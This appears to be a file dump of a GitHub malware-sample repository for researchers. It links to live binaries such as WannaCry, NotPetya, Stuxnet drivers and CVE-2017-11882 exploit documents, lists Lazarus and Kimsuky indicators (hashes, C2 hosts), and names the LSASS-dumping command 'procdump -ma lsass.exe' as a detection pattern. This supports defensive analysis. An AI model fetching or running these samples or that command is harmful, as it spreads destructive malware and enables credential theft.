https://raw.githubusercontent.com/Cherishao/APT-Sample/7ad330aa02d064892f8f3853d8a8be532efab52f/GazaAPTGroup/ImplantBigBang.bin -------------------------------------------------------------------------------- /GazaAPTGroup/TheBigBang.bin: -------------------------------------------------------------------------------- 
https://raw.githubusercontent.com/Cherishao/APT-Sample/7ad330aa02d064892f8f3853d8a8be532efab52f/GazaAPTGroup/TheBigBang.bin -------------------------------------------------------------------------------- /GazaAPTGroup/TheBigBangAPT.doc: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/Cherishao/APT-Sample/7ad330aa02d064892f8f3853d8a8be532efab52f/GazaAPTGroup/TheBigBangAPT.doc -------------------------------------------------------------------------------- /GazaAPTGroup/TheBigBangImplant.bin: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/Cherishao/APT-Sample/7ad330aa02d064892f8f3853d8a8be532efab52f/GazaAPTGroup/TheBigBangImplant.bin -------------------------------------------------------------------------------- /Globelmposter: -------------------------------------------------------------------------------- 1 | Globelmposter 家族首次出现在 2017 年 5 月份,2018 年 2 月全国各大医院受 Globelmposter 2.0 勒索病毒攻击,导致医院系统被加密,2018 年 12 月深信服 EDR 安全团队发现加密后缀为 ‘.fuck’ 的 4.0 版本。 2 | -------------------------------------------------------------------------------- /Globelmposter 3.0 .rar: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/Cherishao/APT-Sample/7ad330aa02d064892f8f3853d8a8be532efab52f/Globelmposter 3.0 .rar -------------------------------------------------------------------------------- /GoziGroup/GoziBankerISFB.exe: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/Cherishao/APT-Sample/7ad330aa02d064892f8f3853d8a8be532efab52f/GoziGroup/GoziBankerISFB.exe -------------------------------------------------------------------------------- /GoziGroup/HeVRmuUO.exe_.exe: -------------------------------------------------------------------------------- 
https://raw.githubusercontent.com/Cherishao/APT-Sample/7ad330aa02d064892f8f3853d8a8be532efab52f/GoziGroup/HeVRmuUO.exe_.exe -------------------------------------------------------------------------------- /GoziGroup/KRKeMaIts.exe_.exe: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/Cherishao/APT-Sample/7ad330aa02d064892f8f3853d8a8be532efab52f/GoziGroup/KRKeMaIts.exe_.exe -------------------------------------------------------------------------------- /GoziGroup/lsPEcswsco.exe_.exe: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/Cherishao/APT-Sample/7ad330aa02d064892f8f3853d8a8be532efab52f/GoziGroup/lsPEcswsco.exe_.exe -------------------------------------------------------------------------------- /GoziGroup/vCfjTmdR.exe_.exe: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/Cherishao/APT-Sample/7ad330aa02d064892f8f3853d8a8be532efab52f/GoziGroup/vCfjTmdR.exe_.exe -------------------------------------------------------------------------------- /GreenbugAPT/GreenBugInfostealer.bin: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/Cherishao/APT-Sample/7ad330aa02d064892f8f3853d8a8be532efab52f/GreenbugAPT/GreenBugInfostealer.bin -------------------------------------------------------------------------------- /GreenbugAPT/Greenbug.bin: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/Cherishao/APT-Sample/7ad330aa02d064892f8f3853d8a8be532efab52f/GreenbugAPT/Greenbug.bin -------------------------------------------------------------------------------- /GreenbugAPT/GreenbugAPTx64.bin: -------------------------------------------------------------------------------- 
https://raw.githubusercontent.com/Cherishao/APT-Sample/7ad330aa02d064892f8f3853d8a8be532efab52f/GreenbugAPT/GreenbugAPTx64.bin -------------------------------------------------------------------------------- /GreenbugAPT/GreenbugInfo.txt: -------------------------------------------------------------------------------- 1 | https://www.scmagazine.com/home/security-news/apts-cyberespionage/researchers-tentatively-link-greenbug-cyberspy-group-to-saudi-shamoon-attackers/ 2 | -------------------------------------------------------------------------------- /GreenbugAPT/ISMDoorx64.bin: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/Cherishao/APT-Sample/7ad330aa02d064892f8f3853d8a8be532efab52f/GreenbugAPT/ISMDoorx64.bin -------------------------------------------------------------------------------- /GreyEnergyAPT/GreyEnergyDropper.bin: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/Cherishao/APT-Sample/7ad330aa02d064892f8f3853d8a8be532efab52f/GreyEnergyAPT/GreyEnergyDropper.bin -------------------------------------------------------------------------------- /GreyEnergyAPT/GreyEnergyDropper.doc: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/Cherishao/APT-Sample/7ad330aa02d064892f8f3853d8a8be532efab52f/GreyEnergyAPT/GreyEnergyDropper.doc -------------------------------------------------------------------------------- /GreyEnergyAPT/GreyEnergyDropper2.bin: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/Cherishao/APT-Sample/7ad330aa02d064892f8f3853d8a8be532efab52f/GreyEnergyAPT/GreyEnergyDropper2.bin -------------------------------------------------------------------------------- /GreyEnergyAPT/GreyEnergyImplant2018.bin: -------------------------------------------------------------------------------- 
https://raw.githubusercontent.com/Cherishao/APT-Sample/7ad330aa02d064892f8f3853d8a8be532efab52f/GreyEnergyAPT/GreyEnergyImplant2018.bin -------------------------------------------------------------------------------- /GreyEnergyAPT/GreyEnergymini.bin: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/Cherishao/APT-Sample/7ad330aa02d064892f8f3853d8a8be532efab52f/GreyEnergyAPT/GreyEnergymini.bin -------------------------------------------------------------------------------- /Hancitor/info.txt: -------------------------------------------------------------------------------- 1 | File Naming Convention : CVE of sample utilization - Sample MD5 2 | -------------------------------------------------------------------------------- /Hancitor/【CVE-2017-11882】-b3d345b26d3fb6e05f1ad38668a649f9: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/Cherishao/APT-Sample/7ad330aa02d064892f8f3853d8a8be532efab52f/Hancitor/【CVE-2017-11882】-b3d345b26d3fb6e05f1ad38668a649f9 -------------------------------------------------------------------------------- /Lazarus IOC (20231027): -------------------------------------------------------------------------------- 1 | #Lazarus 2 | #https://securelist.com/unveiling-lazarus-new-campaign/110888/ 3 | 4 | #MD5 5 | 9cd90dff2d9d56654dbecdcd409e1ef3 6 | 88a96f8730b35c7406d57f23bbba734d 7 | 54df2984e833ba2854de670cce43b823 8 | Ae00b0f490b122ebab614d98bb2361f7 9 | e6fa116ef2705ecf9677021e5e2f691e 10 | 31af3e7fff79bc48a99b8679ea74b589 11 | 9b62352851c9f82157d1d7fcafeb49d3 12 | 3a77b5054c36e6812f07366fb70b007d 13 | E89fa6345d06da32f9c8786b65111928 14 | 15 | #C2 16 | ictm.or.]kr 17 | samwoosystem.co.]kr 18 | theorigin.co.]kr 19 | ucware.]net 20 | friendmc.]com 21 | hankooktop.]com 22 | khmcpharm.]com 23 | vietjetairkorea.]com 24 | yoohannet.]kr 25 | admin.esangedu.]kr 26 | api.shw.]kr 27 | hicar.kalo.]kr 28 | hspje.]com 29 | 
kscmfs.or.]kr 30 | kstr.radiology.or.]kr 31 | little-pet.]com 32 | mainbiz.or.]kr 33 | new-q-cells.]com 34 | pediatrics.or.]kr 35 | pms.nninc.co.]kr 36 | safemotors.co.]kr 37 | swt-keystonevalve.]com 38 | vnfmal2022.]com 39 | warevalley.]com 40 | blastedlevels.]com 41 | droof.]kr 42 | friendmc.]com 43 | hanlasangjo.]com 44 | healthpro.or.]kr 45 | medric.or.]kr 46 | muijae.]com 47 | nonstopexpress.]com 48 | seoulanesthesia.or.]kr 49 | siriuskorea.co.]kr 50 | yoohannet.]kr 51 | -------------------------------------------------------------------------------- /Lazarus IOC (20231101): -------------------------------------------------------------------------------- 1 | #Lazarus 2 | #https://www.elastic.co/security-labs/elastic-catches-dprk-passing-out-kandykorn 3 | 4 | 3ea2ead8f3cec030906dcbffe3efd5c5d77d5d375d4a54cca03bfe8a6cb59940 5 | 2360a69e5fd7217e977123c81d3dbb60bf4763a9dae6949bc1900234f7762df1 6 | 927b3564c1cf884d2a05e1d7bd24362ce8563a1e9b85be776190ab7f8af192f6 7 | 8 | #Domain 9 | tp-globa[.xyz 10 | 11 | #C2 12 | 192.119.64[.43 13 | 23.254.226[.90 14 | -------------------------------------------------------------------------------- /Lazarus IOC (20231108): -------------------------------------------------------------------------------- 1 | #Lazarus 2 | #https://www.jamf.com/blog/bluenoroff-strikes-again-with-new-macos-malware/ 3 | 4 | #C2 Domain 5 | swissborg[.]blog 6 | 7 | #HASH 8 | 8bfa4fe0534c0062393b6a2597c3491f7df3bf2eabfe06544c53bdf1f38db6d4 9 | 15d53bb839e00405a34a8b690ec181f5555fc4f891b8248ae7fa72bad28315a9 10 | f1713afaf5958bdf3e975ebbab8245a98a84e03f8ce52175ef1568de208116e0 11 | b8c751694945bff749b6a0cd71e465747402cfd25b18dc233c336e417b3e1525 12 | c704bd5c5cdc8d65ada8cf8c5c4a0f02e346de84d2a317443ae3eed796673f59 13 | 5b397f36a764f210c1cbd249c3370e9f5bab1d66dc5d9b433f666ac67b4d3e7e 14 | -------------------------------------------------------------------------------- /Lazarus IOC(20240511): 
-------------------------------------------------------------------------------- 1 | #Tags Kimsuky 2 | 3 | #Description 4 | https://www.genians.co.kr/blog/threat_intelligence/facebook 5 | 6 | #IP 7 | 5.9.123.217 8 | 52.177.14.24 9 | 69.163.180.70 10 | 162.0.209.27 11 | 162.0.209.91 12 | 13 | #Domain 14 | brandwizer.co.in 15 | makeoversalon.net.in 16 | rfa.ink 17 | yonsei.lol 18 | mitmail.tech 19 | joongang.site 20 | beastmodser.club 21 | worldinfocontact.club 22 | ielsems.com 23 | dusieme.com 24 | rapportdown.lol 25 | nuclearpolicy101.org 26 | 27 | #Hash 28 | 433655572c0f319e576a451d069a29966f9d6b409207a649f286ab34d1c8cfeb 29 | ec9cc1940fe395867f5bab06016920f7194d753ae8cfa331bea0a44ecc8ef7cf 30 | 2f7f3a86a868f6c5a85fb12fe028fd254cd9622075b179923187461c72d6aea0 31 | 2209f27b08fc10118ef03ca983f1bbdff3ca2371a02382f9f34f64fdcae07ffe 32 | 9c6f6db86b5ccdda884369c9c52dd8568733e126e6fe9c2350707bb6d59744a1 33 | 3140153c3f3e8663496797795992a10089d966a74637846717b9459d3982b1f8 34 | -------------------------------------------------------------------------------- /Lazarus(20231124).xlsx: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/Cherishao/APT-Sample/7ad330aa02d064892f8f3853d8a8be532efab52f/Lazarus(20231124).xlsx -------------------------------------------------------------------------------- /Lazarus(20231127): -------------------------------------------------------------------------------- 1 | #Lazarus 2 | #https://asec.ahnlab.com/en/59318/ 3 | 4 | #sha256 5 | 9f90670d2197496f7d9d20152fe822238d9806716baf55c0078eef937dc8dfdb 6 | 8177455ab89cc96f0c26bc42907da1a4f0b21fdc96a0cc96650843fd616551f4 7 | c3c0cf25d682e981c7ce1cc0a00fa2b8b46cce2fa49abe38bb412da21da99cb7 8 | 0112b5d175f5b5905a744c69bf263e78f317913b9e1b28b684f7e0036cc46584 9 | dd13cf13c1fbdc76da63e76adcf36727cfe594e60af0dc823c5a509a13ae1e15 10 | bc024b4bca0d444ca12e42e1a69215422592c5821c0b2e2dfa51a31b7482e2e4 11 | 
25a3b5e8f07befa6809d000cf0e41929a2ff8a0c3b05fd54b03585e691713303 12 | 58cbe4315620fa8c46317d57e20aa56b1f757699ec794cb79e9cbf87e828d566 13 | 14 | #C2 15 | 27.102.114.215 16 | 137.175.17.221 17 | 137.175.17.172 18 | 176.105.255.60 19 | -------------------------------------------------------------------------------- /Lazarus/BlueNoroff_INK.zip: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/Cherishao/APT-Sample/7ad330aa02d064892f8f3853d8a8be532efab52f/Lazarus/BlueNoroff_INK.zip -------------------------------------------------------------------------------- /Lazarus/DangerousPassword.pdf: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/Cherishao/APT-Sample/7ad330aa02d064892f8f3853d8a8be532efab52f/Lazarus/DangerousPassword.pdf -------------------------------------------------------------------------------- /Lazarus/LazarusMacOS.bin.xltd: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/Cherishao/APT-Sample/7ad330aa02d064892f8f3853d8a8be532efab52f/Lazarus/LazarusMacOS.bin.xltd -------------------------------------------------------------------------------- /Lazarus/LazarusMacOS.bin.xltd.cfg: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/Cherishao/APT-Sample/7ad330aa02d064892f8f3853d8a8be532efab52f/Lazarus/LazarusMacOS.bin.xltd.cfg -------------------------------------------------------------------------------- /Lazarus/RyukRansomware.bin: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/Cherishao/APT-Sample/7ad330aa02d064892f8f3853d8a8be532efab52f/Lazarus/RyukRansomware.bin -------------------------------------------------------------------------------- /Lazarus/elfLazarus.bin: 
-------------------------------------------------------------------------------- https://raw.githubusercontent.com/Cherishao/APT-Sample/7ad330aa02d064892f8f3853d8a8be532efab52f/Lazarus/elfLazarus.bin -------------------------------------------------------------------------------- /Lazarus_IOC(20240424): -------------------------------------------------------------------------------- 1 | #Lazarus 2 | #Description https://www.reddit.com/r/hacking/comments/18npzcl/obfuscated_code_a_recruiter_sent_me/?rdt=64366 3 | #Description https://twitter.com/dimitribest/status/1782609281897902426 4 | 5 | #C2 6 | 173.211.106.101 7 | 45.61.160.14:1224 8 | 147.124.213.17:1244 9 | 147.124.212.89:1224 10 | 147.124.214.237:1244 11 | 147.124.214.129 12 | 147.124.214.131 13 | 147.124.212.146 14 | 45.61.169.99:3000 15 | 67.203.7.171:1244 16 | 167.88.168.152:1224 17 | 67.203.7[.]245 18 | 19 | #Hash 20 | 39785213364b84c1442d133c778bf5472d76d8ef13b58b32b8dd8ac0201c82ca 21 | 6a104f07ab6c5711b6bc8bf6ff956ab8cd597a388002a966e980c5ec9678b5b0 22 | 45c991529a421104f2edf03d92e01d95774bf54325f9107dd4139505912a0c1e 23 | a229e8df494cd747832f7884b9265771ed9d8b45d8efa9df5181e8f8fc69db9d 24 | f790ad0bfe7a465805b44264c88588e70eb3200806ac290150205a57d28d6b1a 25 | -------------------------------------------------------------------------------- /Lazarus_IOC(20240528): -------------------------------------------------------------------------------- 1 | #Tags Lazarus, Moonstone Sleet 2 | 3 | #Description 4 | https://www.microsoft.com/en-us/security/blog/2024/05/28/moonstone-sleet-emerges-as-new-north-korean-threat-actor-with-new-bag-of-tricks/ 5 | 6 | #SHA-256 7 | f59035192098e44b86c4648a0de4078edbe80352260276f4755d15d354f5fc58 8 | cb97ec024c04150ad419d1af2d1eb66b5c48ab5f345409d9d791db574981a3fb 9 | 39d7407e76080ec5d838c8ebca5182f3ac4a5f416ff7bda9cbc4efffd78b4ff5 10 | 70c5b64589277ace59db86d19d846a9236214b48aacabbaf880f2b6355ab5260 11 | cafaa7bc3277711509dc0800ed53b82f645e86c195e85fbf34430bbc75c39c24 12 | 
9863173e0a45318f776e36b1a8529380362af8f3e73a2b4875e30d31ad7bd3c1 13 | f66122a3e1eaa7dcb7c13838037573dace4e5a1c474a23006417274c0c8608be 14 | 56554117d96d12bd3504ebef2a8f28e790dd1fe583c33ad58ccbf614313ead8c 15 | ecce739b556f26de07adbfc660a958ba2dca432f70a8c4dd01466141a6551146 16 | 09d152aa2b6261e3b0a1d1c19fa8032f215932186829cfcca954cc5e84a6cc38 17 | 18 | #Domain 19 | bestonlinefilmstudio.org 20 | blockchain-newtech.com 21 | ccwaterfall.com 22 | chaingrown.com 23 | defitankzone.com 24 | detankwar.com 25 | freenet-zhilly.org 26 | matrixane.com 27 | pointdnt.com 28 | starglowventures.com 29 | mingeloem.com 30 | 31 | #Monitor for suspicious ProcDump execution (command lines that dump LSASS process memory) 32 | procdump -ma lsass.exe 33 | procdump -ma -accepteula lsass.exe 34 | -------------------------------------------------------------------------------- /MiddleEastMalware/AndroidMalware.bin.xltd: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/Cherishao/APT-Sample/7ad330aa02d064892f8f3853d8a8be532efab52f/MiddleEastMalware/AndroidMalware.bin.xltd -------------------------------------------------------------------------------- /MiddleEastMalware/AndroidMalware.bin.xltd.cfg: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/Cherishao/APT-Sample/7ad330aa02d064892f8f3853d8a8be532efab52f/MiddleEastMalware/AndroidMalware.bin.xltd.cfg -------------------------------------------------------------------------------- /MiddleEastMalware/EgyptianPDF.bin: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/Cherishao/APT-Sample/7ad330aa02d064892f8f3853d8a8be532efab52f/MiddleEastMalware/EgyptianPDF.bin -------------------------------------------------------------------------------- /MuddyWaterAPT/Cv.doc.bin: -------------------------------------------------------------------------------- 
https://raw.githubusercontent.com/Cherishao/APT-Sample/7ad330aa02d064892f8f3853d8a8be532efab52f/MuddyWaterAPT/Cv.doc.bin -------------------------------------------------------------------------------- /MuddyWaterAPT/MuddyWaterAPTInformation.txt: -------------------------------------------------------------------------------- 1 | https://securelist.com/muddywater/88059/ 2 | -------------------------------------------------------------------------------- /MuddyWaterAPT/shakva-lb.doc.bin: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/Cherishao/APT-Sample/7ad330aa02d064892f8f3853d8a8be532efab52f/MuddyWaterAPT/shakva-lb.doc.bin -------------------------------------------------------------------------------- /MuddyWaterAPT/【CVE-2017-0199】-b41e0c8a2ce8e9de32b9f62b7c3ca047.docx: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/Cherishao/APT-Sample/7ad330aa02d064892f8f3853d8a8be532efab52f/MuddyWaterAPT/【CVE-2017-0199】-b41e0c8a2ce8e9de32b9f62b7c3ca047.docx -------------------------------------------------------------------------------- /OlympicDestroyer/OlympicDestroyer.bin: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/Cherishao/APT-Sample/7ad330aa02d064892f8f3853d8a8be532efab52f/OlympicDestroyer/OlympicDestroyer.bin -------------------------------------------------------------------------------- /OlympicDestroyer/OlympicDestroyerAtos.bin: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/Cherishao/APT-Sample/7ad330aa02d064892f8f3853d8a8be532efab52f/OlympicDestroyer/OlympicDestroyerAtos.bin -------------------------------------------------------------------------------- /OlympicDestroyer/OlympicSystemStealer.bin: -------------------------------------------------------------------------------- 
https://raw.githubusercontent.com/Cherishao/APT-Sample/7ad330aa02d064892f8f3853d8a8be532efab52f/OlympicDestroyer/OlympicSystemStealer.bin -------------------------------------------------------------------------------- /OlympicDestroyer/OlympicsSouthKorea.bin: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/Cherishao/APT-Sample/7ad330aa02d064892f8f3853d8a8be532efab52f/OlympicDestroyer/OlympicsSouthKorea.bin -------------------------------------------------------------------------------- /README.md: -------------------------------------------------------------------------------- 1 | ### About 2 | 3 | Malware samples used by some APT groups (Lazarus, APT28, APT29, APT32, Emotet...) are published here for analysis and use by other security researchers/malware analysts **:smile:** 4 | 5 | ## malware-traffic 6 | 7 | The [malware-traffic-analysis](https://malware-traffic-analysis.net/2022/06/27/index.html) site contains PCAPs and IOCs of various malware samples. 8 | 9 | ## Report 10 | 11 | - [BlueNoroff](https://securelist.com/the-bluenoroff-cryptocurrency-hunt-is-still-on/105488/) 12 | 13 | ## Sandbox 14 | 15 | - [VT](https://www.virustotal.com/) 16 | - [any](https://any.run/) 17 | - [joe](https://www.joesandbox.com/#windows) 18 | - [threatbook](https://x.threatbook.com/) 19 | 20 | ## Tools 21 | - [Wireshark](https://www.wireshark.org/download.html) 22 | - [Hsword](https://www.52pojie.cn/thread-1358235-1-1.html) 23 | 24 | ### Tips 25 | 26 | Download and run the samples only inside an isolated virtual machine or sandbox. 27 | -------------------------------------------------------------------------------- /Ransomeware/DharmaRansomware.bin: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/Cherishao/APT-Sample/7ad330aa02d064892f8f3853d8a8be532efab52f/Ransomeware/DharmaRansomware.bin -------------------------------------------------------------------------------- 
/Ransomeware/DistrictRansomware.bin: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/Cherishao/APT-Sample/7ad330aa02d064892f8f3853d8a8be532efab52f/Ransomeware/DistrictRansomware.bin -------------------------------------------------------------------------------- /Ransomeware/FoxRansomware.zip: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/Cherishao/APT-Sample/7ad330aa02d064892f8f3853d8a8be532efab52f/Ransomeware/FoxRansomware.zip -------------------------------------------------------------------------------- /Ransomeware/KatyushaRansomware.bin: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/Cherishao/APT-Sample/7ad330aa02d064892f8f3853d8a8be532efab52f/Ransomeware/KatyushaRansomware.bin -------------------------------------------------------------------------------- /Ransomeware/KrakenCryptor2.0.bin: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/Cherishao/APT-Sample/7ad330aa02d064892f8f3853d8a8be532efab52f/Ransomeware/KrakenCryptor2.0.bin -------------------------------------------------------------------------------- /Ransomeware/MINOTAURransomware.false: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/Cherishao/APT-Sample/7ad330aa02d064892f8f3853d8a8be532efab52f/Ransomeware/MINOTAURransomware.false -------------------------------------------------------------------------------- /Ransomeware/MatrixRansomware.bin: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/Cherishao/APT-Sample/7ad330aa02d064892f8f3853d8a8be532efab52f/Ransomeware/MatrixRansomware.bin -------------------------------------------------------------------------------- /Ransomeware/NotPetya.bin: 
-------------------------------------------------------------------------------- https://raw.githubusercontent.com/Cherishao/APT-Sample/7ad330aa02d064892f8f3853d8a8be532efab52f/Ransomeware/NotPetya.bin -------------------------------------------------------------------------------- /Ransomeware/README: -------------------------------------------------------------------------------- 1 | 0xffff0800 Malware Sample Library Dedicated Server 2 | 3 | ----------------------------------------------------- 4 | 5 | Welcome to my malware sample library server. 6 | I post all my favourite malware samples here for other security researchers/malware analysts to analyze and play with. 7 | 8 | **DO NOT RUN SAMPLES ON YOUR OWN BOX!!! USE A VIRTUAL MACHINE!** 9 | 10 | For more information on each of the samples, use VirusTotal, Hybrid Analysis, and/or any other threat intelligence platform. 11 | 12 | ----------------------------------------------------- 13 | http://twitter.com/0xffff0800 14 | Jabber: 0xffff0800@exploit.im 15 | 0xffff0800 Contact: 0xffff0800@protonmail.com 16 | 17 | -------------------------------------------------------------------------------- /Ransomeware/WannaCry.exe: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/Cherishao/APT-Sample/7ad330aa02d064892f8f3853d8a8be532efab52f/Ransomeware/WannaCry.exe -------------------------------------------------------------------------------- /Ransomeware/WannaCry2.exe: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/Cherishao/APT-Sample/7ad330aa02d064892f8f3853d8a8be532efab52f/Ransomeware/WannaCry2.exe -------------------------------------------------------------------------------- /Ransomeware/WannaCryDLL.bin: -------------------------------------------------------------------------------- 
https://raw.githubusercontent.com/Cherishao/APT-Sample/7ad330aa02d064892f8f3853d8a8be532efab52f/Ransomeware/WannaCryDLL.bin -------------------------------------------------------------------------------- /Ransomeware/__README__.txt: -------------------------------------------------------------------------------- 1 | 0xffff0800 Malware Sample Library Dedicated Server 2 | 3 | ----------------------------------------------------- 4 | 5 | Welcome to my malware sample library server. 6 | I post all my favourite malware samples here for other security researchers/malware analysts to analyze and play with. 7 | 8 | **DO NOT RUN SAMPLES ON YOUR OWN BOX!!! USE A VIRTUAL MACHINE!** 9 | 10 | For more information on each of the samples, use VirusTotal, Hybrid Analysis, and/or any other threat intelligence platform. 11 | 12 | ----------------------------------------------------- 13 | http://twitter.com/0xffff0800 14 | Jabber: 0xffff0800@exploit.im 15 | 0xffff0800 Contact: 0xffff0800@protonmail.com 16 | 17 | -------------------------------------------------------------------------------- /Ransomeware/mcrypt.bin: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/Cherishao/APT-Sample/7ad330aa02d064892f8f3853d8a8be532efab52f/Ransomeware/mcrypt.bin -------------------------------------------------------------------------------- /Ransomeware/samsamRansomware.bin: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/Cherishao/APT-Sample/7ad330aa02d064892f8f3853d8a8be532efab52f/Ransomeware/samsamRansomware.bin -------------------------------------------------------------------------------- /Remcos RAT.zip: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/Cherishao/APT-Sample/7ad330aa02d064892f8f3853d8a8be532efab52f/Remcos RAT.zip 
-------------------------------------------------------------------------------- /SLINGSHOT/SlingShot.bin: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/Cherishao/APT-Sample/7ad330aa02d064892f8f3853d8a8be532efab52f/SLINGSHOT/SlingShot.bin -------------------------------------------------------------------------------- /SilverTerrier/info.txt: -------------------------------------------------------------------------------- 1 | File Naming Convention : CVE of sample utilization - Sample MD5 2 | -------------------------------------------------------------------------------- /SilverTerrier/【CVE-2017-11882】-4972fac34f773668a523ef51b4898387: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/Cherishao/APT-Sample/7ad330aa02d064892f8f3853d8a8be532efab52f/SilverTerrier/【CVE-2017-11882】-4972fac34f773668a523ef51b4898387 -------------------------------------------------------------------------------- /SilverTerrier/【CVE-2017-11882】-4a84e57f0b3e7868cea1904cce9c1c7e: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/Cherishao/APT-Sample/7ad330aa02d064892f8f3853d8a8be532efab52f/SilverTerrier/【CVE-2017-11882】-4a84e57f0b3e7868cea1904cce9c1c7e -------------------------------------------------------------------------------- /SilverTerrier/【CVE-2017-11882】-62523aaf31e6d489bdca6d74d19a1927: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/Cherishao/APT-Sample/7ad330aa02d064892f8f3853d8a8be532efab52f/SilverTerrier/【CVE-2017-11882】-62523aaf31e6d489bdca6d74d19a1927 -------------------------------------------------------------------------------- /SilverTerrier/【CVE-2017-11882】-dd0802b2a4c476917099862193e7ab08: -------------------------------------------------------------------------------- 
https://raw.githubusercontent.com/Cherishao/APT-Sample/7ad330aa02d064892f8f3853d8a8be532efab52f/SilverTerrier/【CVE-2017-11882】-dd0802b2a4c476917099862193e7ab08 -------------------------------------------------------------------------------- /Stuxnet Malware/A0055521.sys: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/Cherishao/APT-Sample/7ad330aa02d064892f8f3853d8a8be532efab52f/Stuxnet Malware/A0055521.sys -------------------------------------------------------------------------------- /Stuxnet Malware/Copy of Shortcut to.lnk: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/Cherishao/APT-Sample/7ad330aa02d064892f8f3853d8a8be532efab52f/Stuxnet Malware/Copy of Shortcut to.lnk -------------------------------------------------------------------------------- /Stuxnet Malware/KRvW5H2T.htm: -------------------------------------------------------------------------------- 1 | 2 | 3 | 4 | Index of /Library/Stuxnet Malware/signed drivers 5 | 6 | 7 |

Index of /Library/Stuxnet Malware/signed drivers

8 | 9 | 10 | 11 | 12 | 13 | 14 | 15 | 16 | 17 |
[ICO]NameLast modifiedSizeDescription

[PARENTDIR]Parent Directory  -  
[   ]0d8c2bcb575378f6a88d17b5f6ce70e794a264cdc8556c8e812f0b5f9c7091982018-10-06 01:19 17K 
[   ]63e6b8136058d7a06dfff4034b4ab17a261cdf398e63868a601f77ddd1b328022018-10-06 01:19 25K 
[   ]70f8789b03e38d07584f57581363afa848dd5c3a197f2483c6dfa4f3e7f78b9b2018-10-06 01:19 25K 
[   ]1635ec04f069ccc8331d01fdf31132a4bc8f6fd3830ac94739df95ee093c555c2018-10-06 01:19 26K 

18 |
Apache/2.4.34 (Ubuntu) Server at iec56w4ibovnb4wc.onion Port 80
19 | 20 | -------------------------------------------------------------------------------- /Stuxnet Malware/index (1).html: -------------------------------------------------------------------------------- 1 | 2 | 3 | 4 | Index of /Library/Stuxnet Malware/stuxnet core 5 | 6 | 7 |

Index of /Library/Stuxnet Malware/stuxnet core

8 | 9 | 10 | 11 | 12 | 13 | 14 | 15 | 16 | 17 | 18 | 19 | 20 |
[ICO]NameLast modifiedSizeDescription

[PARENTDIR]Parent Directory  -  
[   ]dropper.exe_2018-10-06 01:19 506K 
[   ]dropper.id02018-10-06 01:19 112K 
[   ]dropper.id12018-10-06 01:19 2.0M 
[   ]dropper.id22018-10-06 01:19 2.6K 
[   ]dropper.nam2018-10-06 01:19 16K 
[   ]dropper.til2018-10-06 01:19 290  
[   ]maindll.decrypted.unpacked.dll_2018-10-06 01:19 1.2M 

21 |
Apache/2.4.34 (Ubuntu) Server at iec56w4ibovnb4wc.onion.si Port 80
22 | 23 | -------------------------------------------------------------------------------- /Stuxnet Malware/index.html: -------------------------------------------------------------------------------- 1 | 2 | 3 | 4 | Index of /Library/Stuxnet Malware/signed drivers 5 | 6 | 7 |

Index of /Library/Stuxnet Malware/signed drivers

8 | 9 | 10 | 11 | 12 | 13 | 14 | 15 | 16 | 17 |
[ICO]NameLast modifiedSizeDescription

[PARENTDIR]Parent Directory  -  
[   ]0d8c2bcb575378f6a88d17b5f6ce70e794a264cdc8556c8e812f0b5f9c7091982018-10-06 01:19 17K 
[   ]63e6b8136058d7a06dfff4034b4ab17a261cdf398e63868a601f77ddd1b328022018-10-06 01:19 25K 
[   ]70f8789b03e38d07584f57581363afa848dd5c3a197f2483c6dfa4f3e7f78b9b2018-10-06 01:19 25K 
[   ]1635ec04f069ccc8331d01fdf31132a4bc8f6fd3830ac94739df95ee093c555c2018-10-06 01:19 26K 

18 |
Apache/2.4.34 (Ubuntu) Server at iec56w4ibovnb4wc.onion.si Port 80
